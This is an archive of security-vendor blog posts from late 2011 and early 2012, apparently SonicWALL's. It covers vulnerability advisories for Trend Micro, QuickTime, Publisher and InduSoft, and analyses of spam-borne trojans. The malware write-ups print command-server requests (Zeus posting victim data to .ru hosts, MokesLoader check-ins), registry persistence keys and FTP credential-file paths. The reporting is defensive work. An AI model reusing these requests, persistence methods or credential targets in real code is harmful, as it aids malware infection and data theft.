Posts

Trend Micro Control Manager Stack BO (Jan 27, 2012)

/in /by

Trend Micro Control Manager is a command center for management of virus infections and other suspicious events. It consolidates the coordination of outbreak prevention actions and management of Trend Micro products and services. Control Manager provides facilities to allow the administrator to access and manipulate it through a web interface. The web interface is composed of various Java applets, ASP and HTML pages, as well as several ISAPI libraries.

One of Trend Micro Control Manager’s components is cmdprocessor.exe. This process uses a proprietary network protocol to communicate with other remote Trend Micro components. The structure of the network messages includes a common header which contains the length of the message, an identifying string, an opcode and opcode specific data.

A stack buffer overflow vulnerability has been discovered in the Trend Micro Control Manager component cmdprocessor.exe. Upon receiving a command with a certain opcode, the vulnerable code will allocate a stack buffer of 408 bytes to store a string field value provided in the received message. Subsequently, the received string is copied into the buffer, using the null character during the copy as the end of string marker. The code fails to verify that the destination buffer is large enough to hold the original string.

By supplying a message containing a large string in the affected field, data on the stack will be overwritten, including the return address and the SEH. A remote, unauthenticated attacker can exploit this vulnerability by sending a carefully crafted message to the vulnerable server. Successful exploitation may allow the attacker to cause a stack buffer overflow, potentially injecting and executing arbitrary code in the security context of the running service.

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature was released:

  • 7317 – Trend Micro Control Manager Buffer Overflow

In addition to the signature released specifically to cover this issue, SonicWALL has numerous existing IPS signatures that detect and block known exploitation techniques and shellcode patterns that may likely be utilized in attacks against vulnerabilities like this one. These signatures proactively detect and block exploits targeting new vulnerabilities.

This vulnerability has been assigned the id CVE-2011-5001 by mitre.
The vendor has released an advisory addressing this issue.

Fake Canada Post Spam campaign leads to Trojan (Jan 20, 2012)

/in /by

The Sonicwall UTM research team received reports of a new Spam compaign purported to come from Canada Post Corporation. The Trojan spreads by using an email that attempts to trick the user into downloading a delivery status PDF file.

Below is a screenshot of the email:

The email provides fake canada post URLs, one of which leads to the download of the Trojan www.magya{removed}.net/trkEE710410485CN.pif

Once downloaded and run, the Trojan injects code into C:WINDOWSSystem32wuauclt.exe and runs it.

The Trojan adds the following files to the filesystem:

  • C:Documents and SettingsAll UsersLocal SettingsTempeldf1dff000f1071.exe [Detected as GAV: Injector.NDP_2 (Trojan)]
  • C:Documents and Settings{USER}Local SettingsTemp0114714.tmp [Detected as GAV: Injector.NDP_6 (Trojan)]

The Trojan adds the following key to the windows registry to enable startup after reboot:

  • HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentversionpoliciesexplorerrun “C:Documents and SettingsAll UsersLocal SettingsTempeldf1dff000f1071.exe”

    • The Trojan makes the following DNS requests:

    • www.goo{removed}n.net
    • www.poli{removed}

    The Trojan was observed posting potentially sensitive encrypted system information to a remote web server:

    The Trojan was also observed making the following request to download additional malware from a remote web server:

    The downloaded file mYhY8A9.exe is saved as: C:Documents and Settings{USER}Local SettingsTemp0114714.tmp [Detected as GAV: Injector.NDP_6 (Trojan)]

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: Injector.NDP (Trojan)
    • GAV: Injector.NDP_2 (Trojan)
    • GAV: Injector.NDP_3 (Trojan)
    • GAV: Injector.NDP_4 (Trojan)
    • GAV: Injector.NDP_6 (Trojan)
    • GAV: Injector.KLH (Trojan)

    Apple QuickTime JPEG 2000 Integer Underflow (Jan 18, 2012)

    /in /by

    QuickTime is an extensible proprietary multimedia framework developed by Apple Inc. It is capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity, including JPEG 2000 media data. QuickTime is integrated with Mac OS X, and it also supports Microsoft Windows.

    JPEG 2000 is an image compression standard and coding system. The JPEG 2000 specification was designed as a replacement to the original JPEG standard, providing features such as efficient variable quality decoding, and efficient low-resolution decoding. The standardized filename extension for JPEG 2000 data is .jp2 for ISO/IEC 15444-1 conforming files and .jpx for the extended part-2 specifications, published as ISO/IEC 15444-2. JPEG 2000 data is stored in codestreams.

    A codestream is a bit-sequence containing all information required for the decoding of an image, and consists of a main header, a sequence of tile-parts (which contain the actual image data), and finishes with an end-of-codestream (EOC) marker. A tile-part consists of a tile-part header and tile-part data. The main header of a codestream is composed by the following markers:

     | SOC | SIZ | COD | COC | QCD | QCC | RGN | POD | PPM | TLM | PLM | CME |

    A vulnerability exists in Apple QuickTime when processing invalid JPEG 2000 marker and its contents from JP2 files. Specifically, the vulnerability is due to an integer underflow when calculating with one of the content values. A remote attacker may exploit this vulnerability to inject and execute malicious code in the target system. And the malicious code will be executed in the security context of the target user.

    SonicWALL UTM team has researched this vulnerability and released the following IPS signature to cover the attack attempts addressing this vulnerability.

    • 7298 Apple QuickTime JPEG 2000 COD Length Integer Underflow

    This vulnerability has been referred by CVE as CVE-2011-3250.

    Zeus spam campaigns continue – Year 2012 (Jan 13, 2012)

    /in /by

    SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from US Department of Homeland Security’s CERT division, warning the user of a Phishing incident and contains a zipped attachment. The zipped attachment in the email is a newer variant of the Zeus Trojan.

    Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

    • Phishing incident report call number: PH000000(Random Number)
      Spoofed: US Government- Computer Emergency Readiness Team

    • FDIC: About your business account (12 digit Alphanumeric)
      Spoofed: US Government- Federal Deposit Insurance Corporation

    • Your Billing Summary as of (DATE)
      Spoofed: Con Edison Inc.

    • DHL Parcel Tracking Notification (Random Number)
      Spoofed: DHL Courier service

    SonicWALL Research team has received more than ten unique payloads in the past week from these campaigns. Zeus binaries found in the zipped attachments from these campaigns looks like:

    screenshot

    Upon execution, it performs following activities:

    • Checks if it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.

    • Drops the following files on the system and runs it:

      • (Application Data)feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
      • (Temp)tmp242dfb15.bat [Deletes the original file and deletes itself]

    • Creates registry entry to ensure that the dropped file runs on system reboot.

    • Connects to a remote C&C server based in China and sends victim machine’s information: 
       			POST /stone2012.php HTTP/1.1 			Host: plantlunch.ru 			..... 			bn1=XXXX&sk1=XXXXX 		 			POST /jinjer.php HTTP/1.1 			Host: viperheart.ru

    SonicWALL Gateway AntiVirus provides proactive protection against these spam campaign via following signature:

    • GAV: Zbot.YMH (Trojan)
    • GAV: Zbot.YW_163 (Trojan)

    screenshot

    Microsoft Security Bulletin Coverage (Jan 10, 2012)

    /in /by

    SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2012. A list of issues reported, along with SonicWALL coverage information follows:

    MS12-001 Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

    • CVE-2012-0001 Windows Kernel SafeSEH Bypass Vulnerability
      This is a local vulnerability.

    MS12-002 Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

    • CVE-2012-0009 Object Packager Insecure Executable Launching Vulnerability
      IPS: 3312 – Suspicious CIFS Traffic 17

    MS12-003 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

    • CVE-2012-0005 CSRSS Elevation of Privilege Vulnerability
      This is a local vulnerability.

    MS12-004 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

    • CVE-2012-0003 MIDI Remote Code Execution Vulnerability
      IPS: 7274 – Suspicious Audio 1b
    • CVE-2012-0004 DirectShow Remote Code Execution Vulnerability
      There is no way to distinguish between normal and attack traffic.

    MS12-005 Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

    • CVE-2012-0013 Assembly Execution Vulnerability
      IPS: 7275 – Malformed PowerPoint Document 3b

    MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

    • CVE-2011-3389 SSL and TLS Protocols Vulnerability
      There is no way to distinguish between normal and attack traffic.

    MS12-007 Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

    • CVE-2012-0007 AntiXSS Library Bypass Vulnerability
      IPS: 3357 – MS IE CSS Cross Domain Information Disclosure 2

    DHL spam campaign leads to MokesLoader Trojan Downloader (Jan 06, 2012)

    /in /by

    SonicWALL UTM Research team observed a increase in spam campaigns employing DHL package delivery schemes. The emails pretending to be from DHL informs the user of a package being sent to their address and that the relevant tracking number is in the attachment. The zipped attachment in the email is a newer variant of the MokesLoader Trojan downloader.

    Email subjects used in this spam campaign include:

    • DHL Delivery refuse
    • DHL Error package delivery
    • DHL shipment status No***
    • Error in the delivery address
    • Error in the delivery address No*******
    • Error package delivery
    • Get your parcel No***
    • Shipment Status No***
    • Track your parcel No******
    • Track your shipment No****

    The body of the email is as shown below: 

     ---------------------------------------------------------------------  Dear customer.     Your package has been sent to your address.    Please find a post label attached which contains a track number of    your package.     Thank you for your attention.    DHL Global Services.  ---------------------------------------------------------------------

    The following file with a misleading icon is present in the zip attachment:

    screenshot

    It performs the following activities when executed:

    • It creates the following files:
      • %appdata%csrss.exe (Copy of itself) [Detected as GAV: “MokesLoader.MS (Trojan)]
      • %appdata%MicrosoftProtectqbfbv.xx
      • %appdata%MicrosoftProtectrpphtrt.nv

    • It reports new infection to a remote server using a uniquely generated login id:
      • GET /aaa/index.php?cmd=getload&login={removed}&sel=sp3ya&ver=5.1&bits=0&file=1&run=ok

    • It creates the following registry entries to ensure infection on reboot:
      • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun Clients “%appdata%csrss.exe”
      • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun mcoyr “rundll32 %appdata%MICROS~1Protectrpphtrt.nv, itgn”
      • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun imfblgk “rundll32 %appdata%MICROS~1Protectqbfbv.xx, namn”

    • It creates a TCP backdoor on the infected machine
      screenshot

    • It reports backdoor port to remote server:
      • GET /aaa/index.php?cmd=getsocks&login={removed}&port=2592 HTTP/1.1

    • The following commands were used to communicate with remote server
      • getgrab
      • getproxy
      • getload
      • getsocks

    • It receives instructions from remote server and downloads additional malware.

    SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

    • GAV: MokesLoader.MS (Trojan)
    • GAV: MokesLoader.MK (Trojan)
    • GAV: MokesLoader.LS (Trojan)
    • GAV: MokesLoader.LH (Trojan)
    • GAV: Dofoil.L#email (Trojan)

    screenshot

    IWS Remote Agent Module Design Weakness (Jan 5, 2012)

    /in /by

    InduSoft Web Studio (IWS) is a collection of automation tools that provide all the automation building blocks to develop HMIs (Human-Machine Interface), SCADA (Supervisory Control and Data Acquisition) systems and embedded instrumentation solutions. Typically a InduSoft Web Studio project is running on a embedded Windows device, which connects to machines, processors or other data-acquisition equipments. The embedded Windows device can connect to a Remote Agent component, which supports various message types in order to handle different tasks.

    A design flaw exists in the Remote Agent component of InduSoft Web Studio. Specifically, the vulnerability is due to a lack of authentication when handling client requests. A remote attacker can exploit this vulnerability by sending a crafted message to the Remote Agent component. Successful exploitation can result in arbitrary file creation or code execution in the security context of the Remote Agent process.

    The vulnerability has been assigned as CVE-2011-4051.

    SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

    • 7265 InduSoft Web Studio Remote Code Execution

    Microsoft out-of-band Bulletin MS11-100 (Dec 30, 2011)

    /in /by

    Microsoft has released an out-of-band bulletin MS11-100 addressing four vulnerabilities on Dec 29th, 2011. The bulletin is rated by Microsoft as critical, and the vulnerabilities are listed as below:

    • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
    • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
    • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
    • ASP.NET Forms Authentication Ticket Caching Vulnerability – CVE-2011-3417

    SonicWALL UTM team has researched these vulnerabilities at the same day and created a couple of IPS signatures to capture the attack traffic. Due to the nature of the vulnerabilities, it is hard to distinguish the legitimate traffic from the attack traffic for some of them. The following are the list of covered vulnerabilities and the IPS signatures.

    • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
      • 7260 Microsoft .NET Framework Denial of Service
      • 7261 Microsoft .NET Framework Denial of Service 2
    • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
      • 7262 ASP.NET Forms Authentication Redirect Vulnerability
    • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
      • 7263 ASP.NET Forms Authentication Bypass 1
      • 7264 ASP.NET Forms Authentication Bypass 2

    For the Microsoft vulnerabilities covered by SonicWALL, please refer to SonicWALL MAPP for details.

    American Arlines Ticket Spam – XP Home Security 2012 (Dec 22, 2011)

    /in /by

    The Sonicwall UTM research team discovered a new spam campaign spreading a well known FakeAV: XP Home Security 2012.

    The Trojan spreads through email and arrives as a zipped email attachment purporting to be from American Airlines:

    The Trojan uses the following icon in an attempt to masquerade as a harmless PDF file:

    The Trojan performs the following DNS queries:

    • www.mortg{removed}.tv
    • www.google.com
    • refunados{removed}.ru
    • www.tria{removed}.org

    The Trojan spawns and injects code into svchost.exe causing it to make the following HTTP GET request from a compromised remote webserver:

    The Trojan downloads 1.exe, renames it to gio.exe and executes it. It uses the following icon:

    The Trojan adds the following files to the filesystem:

    • C:Documents and Settings{USER}Local SettingsApplication Datagio.exe [Detected as GAV: FakeAv.JICD (Trojan)]
    • C:Documents and Settings{USER}Application Datacsrss.exe [Detected as GAV: Bredo.T (Trojan)]
    • C:Documents and Settings{USER}Local SettingsApplication Data708j72l30qfte5ro4u62483b417elw [Detected as GAV: FakeAvCn.C (Trojan)]

    The Trojan adds the following keys to the Windows registry:

    • HKEY_CLASSES_ROOTJ2shellopencommand “C:Documents and Settings{USER}Local SettingsApplication Datagio.exe” -a “%1” %*
    • HKEY_CLASSES_ROOT.exeshellopencommand “C:Documents and Settings{USER}Local SettingsApplication Datagio.exe” -a “%1” %*
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun “WinRAR SFX” “C:Documents and Settings{USER}Application Datacsrss.exe”
    • HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun “bieovju rundll32 C:DOCUME~1{USER}APPLIC~1MICROS~1Protectyxikrlc.n, dquc”

    The Trojan deletes the following keys from the Windows registry to disable automatic updates:

    • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_WUAUSER
    • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv

    The Trojan runs gio.exe using the following command line:

        C:Documents and Settings{USER}Local SettingsApplication Datagio.exe" -dtm -a

    The Trojan pops up the following FakeAV windows in an attempt to fool the user into buying the software:

    The Trojan blocks certain applications from running such as Task Manager, and Internet Explorer:

    The Trojan was observed opening the following files and directories:

        C:Program FilesCommon FilesIpswitchWS_FTP*.*0x00
        C:Documents and Settings{USER}Application DataIpswitchWS_FTPSites*.*
        C:Documents and SettingsAll UsersApplication DataFlashFXP3Sites.dat
        C:Documents and Settings{USER}Application DataFileZillasitemanager.xml
        C:Documents and Settings{USER}Application DataFileZillarecentservers.xml

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: Bredo.T (Trojan)
    • GAV: FakeAv.JICD (Trojan)
    • GAV: FakeAvCn.C (Trojan)

    Microsoft Publisher Memory Corruption (Dec 21, 2011)

    /in /by

    Microsoft Publisher is a document design application for print, web, and various other formats. Publisher is available individually or as part of the Microsoft Office suite. The default file extension for Publisher files is pub.

    The Publisher file format specification is not publicly available. It does share some features with other Microsoft file formats. Publisher files are stored in the Microsoft Compound File meta-format which specifies a virtual filesystem encapsulated within a file. In a Compound Document, data is stored in streams within storages. Publisher data is known to reside in the Root EntryContents and Root EntryEscherEscherStm streams.

    The streams appear in a common form, outlined in the following tables: 

     Offset	Length		Description -------	---------------	-------------------------------- 0x0000	4		structure size (n) 0x0004	n-4		structure data

    Structure data is composed of a variable number of consecutive fields, which have the following format: 

     Offset	Length		Description -------	---------------	-------------------------------- 0x0000	2		index and type (two byte structure) 0x0002	4		size n (present based on type value) 0x0006	n-4		data

    The size of the data field and the presence of the size field depend on the type. Types 16, 18, 20, 24, and 26, seem to indicate the presence of the size field, and in these cases, the data field begins at offset 0x0006. Types that do not indicate the presence of the size field have an implied size that is known to the application, and begin at offset 0x0002. Additionally, Publisher files are also known to contain OfficeArt records. Some OfficeArt records are specified by the host application, and can contain structures encoded in the above format. In particular, the OfficeArtClientAnchor record encodes data using this method.

    A memory corruption vulnerability exists in Microsoft Publisher. The flaw is due to the way in which variable length fields are processed. The size field value is not validated, and used in the calculation of a pointer used to read the data field value.

    A remote attacker can entice a target user to open a specially crafted Microsoft Publisher document to exploit this vulnerability. A successful exploitation attempt may result in arbitrary code execution. An unsuccessful attempt may crash the affected application. Exploiting this vulnerability for code execution is not a trivial task, however it is possible.

    SonicWALL has released two IPS signatures to address known exploits targeting this vulnerability. The following signatures have been released:

    • 7227 – Malformed Publisher Document 4b
    • 7237 – MS Publisher Array Indexing Memory Corruption (MS11-091)

    In addition to the specific signatures released to address this threat, SonicWALL has existing sets of IPS signatures which proactively detect and block widely used exploitation techniques that may be utilized in attacks against this particular vulnerability.

    The vendor has released a security bulletin addressing this issue. The vulnerability has been assigned CVE-2011-3411 by mitre.